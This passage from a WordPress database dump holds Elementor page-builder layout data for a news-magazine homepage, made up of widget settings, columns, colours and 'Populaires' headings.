nit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1355,476,'_elementor_version','0.4'),(1356,477,'_elementor_edit_mode','builder'),(1357,477,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1358,477,'_elementor_version','0.4'),(1360,478,'_elementor_edit_mode','builder'),(1361,478,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"ga